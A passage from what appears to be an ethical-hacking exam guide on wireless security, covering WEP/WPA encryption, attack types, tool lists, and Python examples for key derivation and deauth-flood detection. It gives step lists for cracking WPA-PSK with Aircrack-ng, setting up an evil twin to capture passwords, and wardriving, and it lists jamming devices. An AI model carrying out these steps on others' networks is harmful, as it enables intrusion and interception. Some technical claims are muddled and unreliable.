3. To generate MAC Protocol Data Units (MPDUs), the combination of MSDU and MIC is fragmented.
4. For the MPDU, a 32-bit Integrity Check Value (ICV) is calculated.
5. To produce the encrypted data, the combination of MPDU and ICV is bitwise XORed with the keystream.
6. To generate the MAC frame, the Initialization Vector is added to the encrypted data.

Windows Vista supports both WPA-PSK and WPA-EAP.

- WPA-PSK: PSK stands for Preshared Key. This standard is meant for the home environment. WPA-PSK requires a user to enter an 8-character to 63-character passphrase into a wireless client. WPA converts the passphrase into a 256-bit key.
- WPA-EAP: EAP stands for Extensible Authentication Protocol. This standard relies on a back-end server that runs Remote Authentication Dial-In User Service (RADIUS) for user authentication.

Note: Windows Vista allows a user to use a smart card to connect to a WPA-EAP protected network.
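The conversion of the 8 to 63 character WPA-PSK passphrase into a 256-bit key is the PBKDF2-HMAC-SHA1 mapping defined by IEEE 802.11i (the SSID is the salt, 4096 iterations), which is also why offline guessing of a captured handshake is slow per guess and why precomputed tables only work for one SSID. The following Python code is an added example written for this section, not from the original text or from any product it names: `wpa_psk_to_pmk` computes the key with the standard library, and `passphrase_problems` is a defender-side policy check whose wordlist and rules are constructed assumptions, not part of the standard.

```python
import hashlib
import re

# Constructed stand-in for a dictionary wordlist; a real check would use a large list.
COMMON_WORDS = {"password", "welcome", "wireless", "admin", "letmein", "qwerty"}


def wpa_psk_to_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK-to-PMK mapping from IEEE 802.11i: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the SSID, 4096 iterations, 256-bit (32-byte) output."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def passphrase_problems(passphrase: str, ssid: str, min_len: int = 20) -> list:
    """Defender-side policy check (an assumption of this example, not part of the standard):
    returns the reasons a passphrase falls short of the usual guidance - minimum length,
    dictionary words, reuse of the SSID, and low character-class variety."""
    problems = []
    if len(passphrase) < min_len:
        problems.append(f"shorter than {min_len} characters")
    lowered = passphrase.lower()
    hits = sorted(w for w in COMMON_WORDS if w in lowered)
    if hits:
        problems.append("contains dictionary word(s): " + ", ".join(hits))
    if ssid.lower() in lowered:
        problems.append("contains the SSID")
    classes = sum(bool(re.search(p, passphrase))
                  for p in (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^A-Za-z0-9]"))
    if classes < 3:
        problems.append("uses fewer than three character classes")
    return problems


if __name__ == "__main__":
    # Test vector published with the standard: passphrase "password", SSID "IEEE".
    print(wpa_psk_to_pmk("password", "IEEE").hex())
    print(passphrase_problems("password1", "IEEE"))
```

The PMK for the published test vector (passphrase "password", SSID "IEEE") begins f42c6fc5; changing only the SSID's case produces an unrelated key, which is the salting effect in action.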
Temporal keys

During the four-way handshake, the encryption keys (temporal keys) are derived in WPA1 and WPA2. Encryption keys are derived from the PMK, which is derived during the EAP authentication session. In the EAP success message, the PMK is sent to the AP but is not sent to the Wi-Fi client, as the client has derived its own copy of the PMK.

Crack WPA-PSK using Aircrack

Take the following steps to crack WPA-PSK using Aircrack:

1. Monitor wireless traffic with airmon-ng and collect wireless traffic data with airodump-ng.
2. Deauthenticate the client using aireplay-ng. The client will attempt to authenticate with the AP.
3. Run the capture file through aircrack-ng.

Defend against WPA cracking

- Passphrases: An attacker sniffs the password PMK associated with the "handshake" authentication process. It will be almost impossible to crack the password if it is extremely complicated.
- Passphrase complexity: A random passphrase that is not made up of dictionary words should be selected. A complex passphrase with a minimum length of 20 characters should be selected and changed at regular intervals.
- Client settings: WPA2 should only be used with AES/CCMP encryption. The client settings should be set properly.
- Additional controls: Virtual private network technology such as Remote Access VPN, Extranet VPN, Intranet VPN, etc. should be used. A Network Access Control (NAC) or Network Access Protection (NAP) solution should be implemented for additional control over end-user connectivity.

WPA2

WPA2 is an updated version of WPA. This standard is also known as IEEE 802.11i. WPA2 offers enhanced protection to wireless networks compared with the WPA and WEP standards. It is also available as WPA2-PSK and WPA2-EAP for the home and enterprise environments, respectively.

Break WPA/WPA2 encryption

WPA-PSK initializes TKIP by using a user-defined password. As TKIP is a per-packet key, it is not crackable. However, the keys can be brute-forced using dictionary attacks.
WPA keys can be brute-forced using tools such as aircrack, aireplay, and KisMAC. To capture the WPA/WPA2 authentication handshake, a user only needs to be near the AP for a matter of seconds. A user can crack WPA keys offline by capturing the right type of packets.

WEP vs. WPA vs. WPA2

Attribute                 | WEP        | WPA                          | WPA2
Encryption algorithm      | RC4        | RC4, TKIP                    | AES-CCMP
IV size                   | 24-bit     | 48-bit                       | 48-bit
Encryption key length     | 40/104-bit | 128-bit                      | 128-bit
Integrity check mechanism | CRC-32     | Michael algorithm and CRC-32 | AES-CCMP

Initialization Vector (IV)

An initialization vector (IV) is a block of bits that is required to allow a stream cipher or a block cipher to be executed in any of several streaming modes of operation to produce a unique stream independent from other streams produced by the same encryption key, without having to go through a re-keying process. The size of the IV depends on the encryption algorithm and on the cryptographic protocol in use and is normally as large as the block size of the cipher or as large as the encryption key. The IV must be known to the recipient of the encrypted information to be able to decrypt it.

Weak Initialization Vectors

The Key Scheduling Algorithm creates an Initialization Vector (IV) on the basis of the base key in the RC4 algorithm. A flaw in the WEP implementation of RC4 permits generation of weak IVs. IVs become susceptible to weak key attacks due to the way keys are constructed from the IV. Weak IVs give information regarding the key bytes they were derived from. In order to reveal bytes of the base key, an attacker will gather enough weak IVs. Weak IVs involve the use of the master key. It has no built-in provision for updating the keys.

WEP/WPA cracking tools

The following are WEP/WPA cracking tools:

- WepAttack
- Wesside-ng
- WEPCrack
- ChopChop
- WeDecrypt
- KisMAC

KisMAC

KisMAC is an open-source and free sniffer/scanner application for Mac OS X.
It is more advantageous than MacStumbler, iStumbler, or NetStumbler because it uses monitor mode and passive scanning. KisMAC supports 802.11b/g networks. It reveals hidden, cloaked, or closed SSIDs, shows logged-in clients, and draws area maps of network coverage.

Elcomsoft Wireless Security Auditor

Network administrators use Elcomsoft Wireless Security Auditor to audit accessible wireless networks. It has a built-in wireless network sniffer. It protects your wireless networks and tests the strength of WPA/WPA2-PSK passwords.

AirSnort

AirSnort is a Linux-based WLAN WEP cracking tool that recovers encryption keys. AirSnort operates by passively monitoring transmissions. It uses a ciphertext-only attack and captures approximately 5 to 10 million packets to decrypt the WEP keys.

WEPcrack

WEPcrack is a wireless network cracking tool that exploits the vulnerabilities in the RC4 algorithm, which comprises the WEP security parameters. It mainly consists of three tools:

- WeakIVGen: It allows a user to emulate the encryption output of 802.11 networks to weaken the secret key used to encrypt the network traffic.
- Prism-getIV: It analyzes packets of information until it ultimately matches patterns to the one known to decrypt the secret key.
- WEPcrack: It pulls all the useful data of WeakIVGen and Prism-getIV together to decipher the network encryption.

Wireless threats

The following are wireless threats:

- Wireless access control attack
- Integrity attack
- Confidentiality attack
- Availability attack
- Authentication attack

Wireless access control attack

The primary goal of a wireless access control attack is to penetrate a network by evading WLAN access control measures, such as AP MAC filters and 802.1X port access controls. Some examples of wireless access control attacks are as follows:

- Wardriving: In this attack, the attacker discovers wireless LANs by listening to beacons or sending probe requests. This provides a launch point for further attacks.
- Rogue access points: In this attack, the attacker installs an unsecured access point inside the firewall to create an open backdoor into a trusted network.
- Ad hoc associations: In this attack, the attacker connects directly to an unsecured station to avoid AP security or to attack the station.
- MAC spoofing: In this attack, the attacker reconfigures their own MAC address to pose as an authorized AP or station.
- Promiscuous client: It is similar to an evil twin attack. The only difference is that a promiscuous client is not based on fooling a user into taking a free unsecured network; it forces the user to connect to the unsecured network.
- Client mis-association: In this attack, the attacker sets up a rogue access point outside the corporate network and allows users to connect to it and bypass the security policies through it.
- Unauthorized association: In this attack, the attacker infects the victim's system and activates soft access points. This allows attackers to make an unauthorized connection to the enterprise network.
- AP misconfiguration: In this attack, the attacker steals the SSID and connects to the access point. Access points are configured to broadcast SSIDs to authorized users. Network administrators incorrectly use SSIDs as passwords in order to verify authorized users. Intruders use SSID broadcasting to steal an SSID and connect to the access point. SSID broadcasting is a configuration error.

Integrity attack

An integrity attack sends forged control, management, or data frames over a wireless network in order to mislead the recipient or perform another type of attack. Some examples of the integrity attack are as follows:

- Data frame injection: In this attack, the attacker crafts and sends forged 802.11 frames.
- WEP injection: In this attack, the attacker cracks WEP encryption keys using tools.
- Data replay: In this attack, the attacker captures 802.11 data frames for later replay.
- Initialization vector replay attack: In this attack, a known plaintext is sent to an observable WLAN client. The attacker sniffs the WLAN for the predicted ciphertext and uses the known frame to derive the key stream. The attacker then grows this key stream to subvert the network.
- Bit-flipping attack: In this attack, the attacker tampers with the payload of the frame to modify the higher-layer packet.
- Extensible AP replay: In this attack, the attacker captures 802.1X Extensible Authentication Protocol messages for later replay.
- RADIUS replay: In this attack, the attacker captures RADIUS access-accept or reject messages for later replay.
- Virus: It is a computer program that can copy itself and infect a computer without the permission or knowledge of the owner.

Confidentiality attack

In a confidentiality attack, the attacker intercepts private information sent over wireless associations. It may be in cleartext, or encrypted by 802.11 or higher-layer protocols. Some examples of the confidentiality attack are as follows:

- Eavesdropping: It is the process of listening to private conversations and network traffic to gain confidential information.
- Traffic analysis: It is the process of identifying communication patterns and participants by monitoring transmissions.
- Evil twin AP: It is the process of masquerading as an authorized AP by beaconing the SSID to lure users. A laptop with Internet connectivity (3G or wired connection) and a mini access point are required to set up an evil twin. Take the following steps to set up an evil twin:
  1. Enable Internet Connection Sharing in Windows 7 or Internet Sharing in Mac OS X.
  2. Broadcast your Wi-Fi connection and capture passwords by running a sniffer program.
- Masquerading: It is the process of impersonating an authorized user in order to gain specific unauthorized privileges.
- Cracking WEP key: It is the process of recovering a WEP key by capturing data using a passive or active method.
- Man-in-the-middle attack: It is the process of intercepting TCP sessions or SSH/SSL tunnels using MITM tools on an evil twin AP.
- Session hijacking: It refers to the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.
- Honeypot access point: Hackers set up honeypot access points with default SSIDs, hotspot SSIDs, and corporate SSIDs. A client automatically connects to this AP, which then executes various attacks on the client.

Evil twin phishing

Evil twin phishing is the wireless version of the phishing scam. In this attack, an attacker fools wireless users into connecting a laptop or mobile phone to a tainted hotspot by posing as a legitimate provider. He uses a bogus base station that someone connects to using Wi-Fi wireless technology. By imitating the name of another, legitimate wireless provider, the attacker can fool people into trusting the Internet services being provided. When the users log into bank or e-mail accounts, the phishers have access to the entire transaction, since it is sent through their equipment. Unwitting web users are invited to log into the attacker's server with bogus login prompts, tempting them to give away sensitive information such as usernames and passwords. Often users are unaware they have been duped until well after the incident has occurred. Users think they have logged on to a wireless hotspot connection when in fact they have been tricked into connecting to the attacker's base station. The hacker jams the connection to the legitimate base station by sending a stronger signal within proximity to the wireless client, thereby turning itself into an 'evil twin'.

Availability attack

The primary goal of an availability attack is to prevent legitimate users from accessing resources in a wireless network. Some examples of an availability attack are as follows:

- Disassociation attack: In this attack, the attacker destroys the connectivity between a station and an access point.
- ARP cache poisoning attack: In this attack, the attacker sniffs data and sends a spoofed ARP message to the LAN. Once the spoofed message is sent, data intended for the router or the network is received by the attacker.
- Power saving attack: In this attack, the attacker uses the Traffic Indication Map (TIM) message to fool the client into entering the sleep state that was designed for power saving.
- Access point theft: In this attack, the attacker removes an access point from a public place.
- DoS attack: In this attack, the attacker makes a computer resource unavailable to its intended users.
- Beacon flood: In this attack, the attacker makes it difficult for stations to find a legitimate access point by generating a large number of counterfeit 802.11 beacons.
- Authenticate flood: In this attack, the attacker sends forged authentication or association frames from random MACs to fill a target AP's association table.
- De-authenticate flood: In this attack, the attacker disconnects users from an access point by flooding stations with forged disassociations or deauthentications.
- TKIP MIC exploit: In this attack, the attacker suspends WLAN service by generating invalid TKIP data to exceed the target AP's MIC error threshold.
- EAP-failure: In this attack, the attacker observes a valid 802.1X EAP exchange and sends a forged EAP-failure message to the station.
- Routing attack: It includes eavesdropping, hijacking, DoS, etc.

Authentication attack

The primary goal of an authentication attack is to gain access to unauthorized network resources by misusing the identity of Wi-Fi clients, their personal information, login credentials, etc. Some examples of authentication attacks are as follows:

- Application login theft: In this attack, the attacker captures a user's login credentials from cleartext application protocols.
- PSK cracking: In this attack, the attacker uses a dictionary tool to recover a WPA/WPA2 PSK from captured key handshake frames.
- Shared key guessing: In this attack, the attacker performs 802.11 shared key authentication using vendor default, guessed, or cracked WEP keys.
- Domain login cracking: In this attack, the attacker uses a brute force or dictionary tool to recover user credentials by cracking NetBIOS password hashes.
- Identity theft: In this attack, the attacker captures a user's credentials from cleartext 802.1X identity response packets.
- Password speculation: In this attack, the attacker performs 802.1X authentication to guess the user password using a captured identity.
- LEAP cracking: In this attack, the attacker cracks the NT password hash using a dictionary attack tool to recover a user's credentials from captured 802.1X LEAP packets.
- VPN login cracking: In this attack, the attacker runs a brute force attack on VPN authentication protocols to recover a user's credentials.

Rogue access point attack

A rogue AP (rogue access point) is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a cracker to conduct a man-in-the-middle attack. A rogue access point creates a security threat to large organizations because anyone with access to the premises can maliciously install an inexpensive wireless router that can give unauthorized parties access to a secure network. Rogue access points do not employ mutual authentication.

Man-in-the-middle attack

In a man-in-the-middle attack, the attacker connects the victim's laptop to a fake WLAN Access Point (AP). For this, the attacker uses a device that receives Bluetooth packets in promiscuous mode. After that, the device sends forged packets to the mobile and laptop of the victim. In this attack, the attacker first records the Bluetooth session and then replays it. The following steps should be taken to perform an MITM attack using Aircrack-ng:

1. Run airmon-ng in monitor mode and start airodump to discover SSIDs on the interface.
2. De-authenticate the client using aireplay-ng and associate your wireless card with the AP that you are accessing with aireplay-ng.

Wireless ARP poisoning attack

There is a normal flow of wireless traffic between a user's wireless laptop and Access Point B. An attacker takes the following steps to perform the wireless ARP poisoning attack:

1. The attacker spoofs the MAC address of the user's wireless laptop to authenticate to Access Point A.
2. Access Point A sends the updated MAC address information to the network routers and switches. The network routers and switches then update their routing and switching tables.
3. Traffic destined from the network's backbone to the user's system is no longer sent to Access Point B.

Unauthorized association

Soft access points are useful in providing unauthorized association. Soft access points are client cards or embedded WLAN radios in some PDAs and laptops. They can be activated inadvertently or via a virus program. Attackers infect the victim's machine and activate soft access points. This allows them to make an unauthorized connection to the enterprise network. Instead of connecting to the enterprise network through the actual access point, attackers connect to it through soft access points.

PDA

Personal digital assistant (PDA) is a term for any small mobile hand-held device that provides computing and information storage and retrieval capabilities for business or personal use, such as keeping schedule calendars and address book information. Most PDAs have a small keyboard. Some PDAs have an electronically sensitive pad that accepts handwriting.

Ad hoc network

Ad hoc is a basic topology of a wireless network. An ad hoc network consists of two or more wireless devices that communicate directly with each other.
The wireless local area network (WLAN) network interface adapters in the wireless devices generate omni-directional signals within a limited range called the basic service area (BSA). When two wireless devices come within range of each other, they immediately form a two-node network and are able to communicate with each other. An ad hoc network is non-transitive.

Ad hoc connection attack

Wi-Fi clients communicate directly through ad hoc mode, which does not need an AP to relay packets. Ad hoc mode is inherently insecure. It does not provide strong authentication and encryption. Hence, attackers can easily connect to and compromise an enterprise client working in ad hoc mode.

Jamming

Jamming is a type of Web server attack that is used to compromise a wireless environment. It denies service to authorized users, as legitimate traffic is jammed by the overwhelming frequencies of illegitimate traffic. With the help of some tools, an attacker can easily jam the 2.4 GHz frequency in a way that drops the signal to a level where the wireless networks can no longer function. Some widely used consumer products, such as cordless phones, baby monitors, and Bluetooth-enabled devices, are all capable of interrupting the signal of a wireless network and faltering traffic.
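Unlike RF jamming, the frame-level availability attacks listed above (beacon flood, authenticate flood, de-authenticate and disassociate floods) leave a signature that a monitor-mode sensor can count: bursts of management frames within a short window, often from random source MACs. The following Python code is an added detection example written for this section; it is not from the original text or from any tool the text names. The frame records are constructed to resemble what a sniffer decodes, the field names are chosen here, and the thresholds are assumed values a deployment would tune.

```python
from collections import defaultdict

DEAUTH_SUBTYPES = {"deauth", "disassoc"}
AUTH_SUBTYPES = {"auth", "assoc-req"}


def _max_in_window(times, window):
    """Largest number of events inside any `window`-second interval (two-pointer sweep)."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def _max_distinct_in_window(events, window):
    """Largest number of distinct values whose timestamps fall inside any `window`-second interval."""
    events = sorted(events)  # (timestamp, value)
    best = start = 0
    counts = defaultdict(int)
    for end, (t, value) in enumerate(events):
        counts[value] += 1
        while t - events[start][0] > window:
            old = events[start][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            start += 1
        best = max(best, len(counts))
    return best


def detect_floods(frames, window=1.0, deauth_threshold=10,
                  auth_threshold=8, beacon_threshold=15):
    """Return (kind, target, count) alerts for management-frame floods.
    - deauth/disassoc: many frames for one BSSID in the window
    - authenticate flood: many distinct source MACs sending auth/assoc requests to one AP
    - beacon flood: many distinct BSSIDs beaconing at once"""
    deauth_by_bssid = defaultdict(list)
    auth_by_ap = defaultdict(list)
    beacons = []
    for f in frames:
        if f["subtype"] in DEAUTH_SUBTYPES:
            deauth_by_bssid[f["bssid"]].append(f["ts"])
        elif f["subtype"] in AUTH_SUBTYPES:
            auth_by_ap[f["dst"]].append((f["ts"], f["src"]))
        elif f["subtype"] == "beacon":
            beacons.append((f["ts"], f["bssid"]))
    alerts = []
    for bssid, times in deauth_by_bssid.items():
        n = _max_in_window(times, window)
        if n >= deauth_threshold:
            alerts.append(("deauth/disassoc flood", bssid, n))
    for ap, events in auth_by_ap.items():
        n = _max_distinct_in_window(events, window)
        if n >= auth_threshold:
            alerts.append(("authenticate flood from random MACs", ap, n))
    n = _max_distinct_in_window(beacons, window)
    if n >= beacon_threshold:
        alerts.append(("beacon flood", "*", n))
    return alerts


def build_sample():
    """Constructed capture: normal beacons and one real deauth, then two floods."""
    ap, client, bcast = "00:11:22:33:44:55", "aa:bb:cc:00:00:01", "ff:ff:ff:ff:ff:ff"
    frames = [{"ts": i * 0.1, "subtype": "beacon", "src": ap, "dst": bcast, "bssid": ap}
              for i in range(20)]
    frames.append({"ts": 0.5, "subtype": "deauth", "src": ap, "dst": client, "bssid": ap})
    # 40 forged deauths spoofing the AP within 0.4 s
    frames += [{"ts": 1.0 + i * 0.01, "subtype": "deauth", "src": ap, "dst": client, "bssid": ap}
               for i in range(40)]
    # auth requests from 12 random source MACs within 0.3 s
    frames += [{"ts": 2.0 + i * 0.025, "subtype": "auth", "src": f"02:00:00:00:00:{i:02x}",
                "dst": ap, "bssid": ap} for i in range(12)]
    return frames
```

On the constructed capture the first 21 frames (periodic beacons plus a single legitimate deauth) raise nothing, while the two bursts produce one deauth/disassoc alert and one authenticate-flood alert; counting distinct sources rather than raw frames is what separates a real client storm from the random-MAC pattern.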
The following are Wi-Fi jamming devices:

Wi-Fi jamming device | Description
MGT-P6 GPS Jammer    | Range: 10~20 meters, 4 antennas, 3G: 2110~2170 MHz, and Wi-Fi/Bluetooth: 2400~2485 MHz
MGT-02 Jammer        | Range: 20~50 meters and 4 antennas
MGT-MP200 Jammer     | Range: 50-75 m, Barrage + DDS sweep jamming 20 to 2500 MHz, and omnidirectional antennas
MGT-03 Jammer        | Range: 0~40 meters and 4 antennas
MGT-P6 WiFi Jammer   | Range: 10~20 meters, iDen - CDMA - GSM: 850~960 MHz, DCS - PCS: 1805~960 MHz, 3G: 2110~2170 MHz, Wi-Fi / Bluetooth: 2400~2485 MHz, and 4 antennas
MGT-P3x13 Jammer     | Range: 50~200 meters and 3 frequency bands jammed

Mobile phone jammer

A mobile phone jammer is an instrument used to prevent cellular phones from receiving signals from or transmitting signals to base stations. When used, the jammer effectively disables cellular phones. These devices can be used in practically any location, but are found primarily in places where a phone call would be particularly disruptive because silence is expected. It blocks cell phone use by sending out radio waves along the same frequencies that cellular phones use. This causes enough interference with the communication between cell phones and towers to render the phones unusable. On most retail phones, the network would simply appear out of range.

Email jamming

Email jamming is the use of sensitive words in e-mails to jam the authorities that listen in on them by providing a form of red herring and an intentional annoyance. In this attack, the attacker deliberately includes "sensitive" words and phrases in otherwise innocuous emails to ensure that these are picked up by the monitoring systems. As a result, the senders of these emails will eventually be added to a "harmless" list and their emails will no longer be intercepted; hence, it allows them to regain some privacy.

WAP

Wireless Access Point (WAP) is a communication device that is capable of both transmitting and receiving signals in a wireless LAN.
This unit is connected to servers or directly to a network and other devices using a standard cabled network protocol.

WTLS

Wireless Transport Layer Security (WTLS) is a security layer of WAP, which is specifically designed for a wireless environment. It provides privacy, data integrity, and authentication for client-server communications over a wireless network. WTLS ensures that a client and server are authenticated so that wireless transactions remain secure and the connection is encrypted. WTLS is required because a wireless network does not provide end-to-end security.

WEP

Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks (WLANs). It has two components, i.e., authentication and encryption. It provides security for wireless networks. WEP encrypts data on a wireless network by using a fixed secret key. WEP incorporates a checksum in each frame to provide protection against attacks that attempt to reveal the key stream.

IEEE 802.1X Authentication

The IEEE 802.1X standard defines a method of authenticating and authorizing users to connect to an IEEE 802 LAN. It blocks users from accessing the network on the failure of authentication. IEEE 802.1X supports the Extensible Authentication Protocol-Transport Level Security (EAP-TLS) and Protected EAP-Microsoft Challenge Handshake Authentication Protocol version 2 (PEAP-MS-CHAP v2) protocols. In the IEEE 802.1X authentication system, an access point receives a connection request from a wireless client and forwards the request to the RADIUS server. The RADIUS server then uses the Active Directory database to determine whether the client should be granted access to the network.

Shared Key Authentication

Shared Key is an authentication method used by wireless LANs that follow the IEEE 802.11 standard. Wireless devices authenticate each other by using a secret key that is kept by both devices.
Shared Key authentication is not very secure, as all the computers in the basic service set (BSS) use the same key. Hence, any security lapse on one computer can compromise the security of the entire BSS. The WEP algorithm must be implemented to enable Shared Key authentication.

15.3 Understand wireless hacking methodology, and assess wireless hacking tools

Exam Focus: Understand wireless hacking methodology, and assess wireless hacking tools. Objective includes:

- Understand wireless hacking methodology.
- Assess wireless hacking tools.

Wireless hacking methodology

The wireless hacking methodology is used to gain unauthorized access to network resources by compromising a Wi-Fi network. The following is the wireless hacking methodology:

- Wi-Fi discovery
- GPS mapping
- Wireless traffic analysis
- Launch wireless attacks
- Crack Wi-Fi encryption

Finding Wi-Fi networks for attacks

An attacker checks the potential networks that are in his range to determine the best one to attack. A Wi-Fi enabled laptop with a wireless discovery tool installed is used to map out active wireless networks. A laptop with a Wi-Fi card, an external Wi-Fi antenna, and network discovery programs can be used to discover Wi-Fi networks.

Footprint the wireless network

When an attack is made on a wireless network, it begins with discovering and footprinting the network, in either an active or a passive way. The following are footprinting methods:

- Passive method: This method is used to detect the existence of the AP. It involves sniffing packets from the airwaves. This will reveal the AP, the SSID, and the wireless devices that are live.
- Active method: In this method, a probe request with the SSID is sent by the attacker's wireless device to check whether the AP responds or not. The wireless device will send the probe request with an empty SSID if it does not have the SSID to begin with.
Wi-Fi discovery tools

The following are Wi-Fi discovery tools:

- WiFi Hopper
- Wavestumbler
- iStumbler
- WiFinder
- Meraki WiFi Stumbler
- Wellenreiter
- AirCheck Wi-Fi Tester
- AirRadar 2
- inSSIDer
- NetSurveyor
- NetStumbler
- Vistumbler
- WirelessMon

NetSurveyor

NetSurveyor is an 802.11 network discovery tool used to collect information about adjacent wireless access points in real time and display this information in a useful way. The data is displayed using various diagnostic views and charts. Data can be recorded for later use. NetSurveyor generates reports in Adobe PDF format.

NetStumbler

NetStumbler is a Windows-based tool that is used for the detection of wireless LANs using the IEEE 802.11a, 802.11b, and 802.11g standards. It detects wireless networks and marks their relative position with a GPS. It uses an 802.11 Probe Request sent to the broadcast destination address. When NetStumbler is connected to a GPS, it records a GPS coordinate for the highest signal strength found at each access point. The main features of NetStumbler are as follows: it displays the signal strength of a wireless network, MAC address, SSID, channel details, etc. It is commonly used for:

1. War driving
2. Detecting unauthorized access points
3. Detecting causes of interference on a WLAN
4. WEP ICV error tracking
5. Making graphs and alarms on 802.11 data, including signal strength

How to detect and identify NetStumbler

NetStumbler uses an organizationally unique identifier (OID) of 0x00601d and a protocol identifier (PID) of 0x0001. It also uses a data payload size of 58 bytes containing a unique string that can be used to identify the version of NetStumbler. For example, version 3.2.0 carries 'Flurble gronk bloopit, bnip Frundletrune', version 3.2.3 has the payload string 'All your 802.11b are belong to us', and 3.3.0 has a payload string that is intentionally left blank.
Hence, with the help of these fingerprints, a network administrator can not only easily detect the symptoms of NetStumbler but also identify the version of NetStumbler being used by an attacker.

Vistumbler

Vistumbler is a wireless network scanner used to find wireless access points. It is written in AutoIt for Vista, Windows 7, and Windows 8. Vistumbler uses the 'netsh wlan show networks mode=bssid' Vista command to get wireless information. It supports GPS and live Google Earth tracking.

WirelessMon

WirelessMon is a tool used to monitor the status of a wireless Wi-Fi adapter and collect information about nearby wireless access points and hot spots in real time. It logs all the wireless information that it has collected into a file for archival purposes and future reference.

GPS mapping

An attacker creates a map of discovered Wi-Fi networks and uses statistics gathered by Wi-Fi discovery tools to create a database. GPS is used for tracking the location of the discovered Wi-Fi networks and uploading the coordinates to sites such as WIGLE.

WIGLE

WIGLE (Wireless Geographic Logging Engine) is a GPS mapping tool. It is a website used to collect information about various wireless hotspots around the world. Users can register on the site and upload hotspot data, such as GPS coordinates, SSID, MAC address, and the encryption type used on the hotspots discovered.

Discover Wi-Fi networks using wardriving

Take the following steps to discover Wi-Fi networks using wardriving:

1. Register with WIGLE and download map packs of your area in order to view the plotted access points on a geographic map.
2. Connect the antenna and GPS device to the laptop through a USB serial adapter and mount them in a car.
3. Install and launch NetStumbler and the WIGLE client software and turn on the GPS device.
4. Drive the car at a speed of 35 mph or below.
5. Capture and save the NetStumbler log file that includes the GPS coordinates of the access points. Upload this log file to WIGLE.
This will then automatically plot the points onto a map.

Wireless traffic analysis

An attacker can identify vulnerabilities and susceptible victims in a target wireless network by performing wireless traffic analysis. Wireless traffic analysis is helpful in determining the strategy that is appropriate for a successful attack. Wireless packets can be easily sniffed and analyzed, as traffic over the air is not serialized. The attacker analyzes a wireless network in order to determine the broadcast SSID, the presence of multiple access points, the possibility of recovering SSIDs, the authentication method used, and the WLAN encryption algorithm.

Wireless cards and chipsets

It is important to select the right Wi-Fi card, since tools such as Aircrack-ng and KisMAC work only with selected wireless chipsets.

AirPcap

The AirPcap adapter is used to capture full 802.11 data, management, and control frames. These frames can be viewed in Wireshark for in-depth protocol dissection and analysis. AirPcap can decrypt WEP/WPA-encrypted frames if configured. It is used for traffic injection to secure the wireless network and is supported in Aircrack-ng, Cain & Abel, and Wireshark.

Wireless sniffers

The following are wireless sniffers:

- ApSniff
- NetworkMiner
- Airscanner Mobile Sniffer
- Observer
- WifiScanner
- Mognet
- AirTraf
- Prism2Dump

CommView

CommView is a network monitor and analyzer designed for an individual who wants a full picture of the traffic flowing through a PC or LAN segment. It is used to collect information from the wireless adapter and decode the analyzed data.

OmniPeek

OmniPeek is a packet analyzer software tool used for network troubleshooting and protocol analysis. The OmniPeek network analyzer offers an intuitive, easy-to-use graphical interface that engineers can use to rapidly analyze and troubleshoot enterprise networks.

Kismet

Kismet is a Linux-based 802.11 wireless network sniffer and intrusion detection system.
It works with any wireless card that supports raw monitoring (rfmon) mode and can sniff 802.11a, 802.11b, 802.11g, and 802.11n traffic. Kismet can be used for the following tasks:
- Identifying networks by passively collecting packets
- Detecting standard named networks
- Detecting masked (hidden-SSID) networks
- Detecting the presence of non-beaconing networks from their data traffic

Spectrum analyzer
An RF spectrum analyzer performs the following functions:
- It examines Wi-Fi radio transmissions.
- It measures the power (amplitude) of radio signals and RF pulses and converts the measurements into numeric sequences.
- It uses statistical analysis to plot spectral usage, quantify air quality, and isolate transmission sources.
RF technicians use spectrum analyzers for the following purposes:
- Installing and maintaining wireless networks.
- Identifying sources of interference.
- Helping to detect wireless attacks, since a jammer or a rogue transmitter shows up in the spectrum even when it sends no decodable 802.11 frames.
Wi-Spy with Chanalyzer, AirMagnet Wi-Fi Analyzer, and WifiEagle are spectrum analysis tools.
RF monitoring tools
The following are RF monitoring tools: NetworkManager, KWaveControl, KWiFiManager, NetworkControl, Qwireless, KOrinoco, and APHunter.

Wi-Fi connection manager tools
The following are Wi-Fi connection manager tools: Aironet Wireless LAN, Boingo, Odyssey Access Client, HandyWi, Wireless Zero Config, QuickLink Mobile, Mobile Connect, and Intel PROSet.

Wi-Fi traffic analyzer tools
The following are Wi-Fi traffic analyzer tools: Aruba Spectrum Analyzer, OptiView Network Analyzer, Ufasoft Snif, Network Assistant, AirMagnet Handheld Analyzer, Network Packet Analyzer, Network Observer, and vxSniffer.

Wi-Fi raw packet capturing tools
The following are Wi-Fi raw packet capturing tools: WirelessNetView, Pirni Sniffer, Tcpdump, Airview, and PCAGizmo.

Wi-Fi spectrum analyzing tools
The following are Wi-Fi spectrum analyzing tools: Cisco Spectrum Expert, WifiSleuth, Wi-Spy, BumbleBee, and AirMedic.

Aircrack-ng suite
Aircrack-ng is a software suite for 802.11 wireless networks that includes a detector, a packet sniffer, a WEP and WPA/WPA2-PSK cracker, and analysis tools.

Disassociation attack
(The original figure is not reproduced.) In a disassociation attack, the attacker spoofs the access point's BSSID as the source address and sends disassociation frames to a client, or to the broadcast address; the client drops its association and must re-associate before it can pass traffic again.

Deauthentication attack
(The original figure is not reproduced.) In a deauthentication attack, the attacker sends spoofed deauthentication frames that again appear to come from the access point, so the client is logged off the network entirely and must re-authenticate. Because 802.11 management frames are not authenticated in WEP, WPA, and WPA2 networks unless 802.11w (protected management frames) is in use, any station that knows the BSSID and the client's MAC address can send these frames. They are used to force the WPA handshake to be repeated so it can be captured, to push clients onto a rogue access point, or simply as a denial of service.

Hotspotter
